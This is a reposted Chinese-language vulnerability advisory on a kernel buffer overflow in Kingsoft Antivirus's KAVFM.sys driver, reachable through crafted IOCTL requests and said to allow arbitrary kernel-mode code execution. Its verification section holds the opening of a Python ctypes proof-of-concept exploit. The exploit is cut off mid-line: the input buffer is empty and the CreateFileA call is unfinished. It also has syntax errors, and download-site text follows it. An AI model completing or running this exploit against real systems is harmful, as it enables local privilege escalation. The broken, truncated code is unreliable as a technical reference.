金山毒霸KAVFM.sys驱动IOCTL处理内核缓冲区溢出漏洞及修好
发表时间:2022-10-20 来源:学卫网整理相关软件相关文章人气:
金山毒霸打造从云到端的整体防御。产品研发部自豪的称这个版本拥有三个之最:安装包最小;新病毒的响应速度最快;系统的资源开销最小。独创可信云安全,运用云杀毒,联网即可享有最新的病毒防杀能力。
影响版本:
Kingsoft Antivirus 2010.04.26.648
漏洞描述:
金山毒霸是一种个人电脑安全防护软件,集合了查毒、杀毒、实时监控、垃圾邮件过滤、防网页挂马和隐私数据保护等实用性强的功能于一身。
本地用户可以通过向金山毒霸所安装的KAVFM.sys驱动提交恶意IOCTL请求触发缓冲区溢出,导致执行任意内核态代码。
<*参考
Lufeng Li (lilf@neusoft.com)
http://secunia.com/advisories/41393/
*>
验证:
#!/usr/bin/python
#################################################################
#
# Title: Kingsoft Antivirus Kernel Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.duba.net
# Platform: Windows XPSP3 Chinese Simplified
# Tested: Kingsoft Antivirus v2010.04.26.648
# Vulnerable: Kingsoft Antivirus <=v2010.04.26.648
# Vulnerable App: http://down10b.zol.com.cn/shadu/KAV100625_DOWN_10_166.zip?key=314e0cb9ea82720d90caae96bb918009
#################################################################
# Code :
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == __main__:
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
DEVICE_NAME = "\\.\kavfm"
dwReturn = c_ulong()
out_size = 1024
in_size = 1024
in_data =
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ
软件下载:
(网视站,专业提供浏览器下载)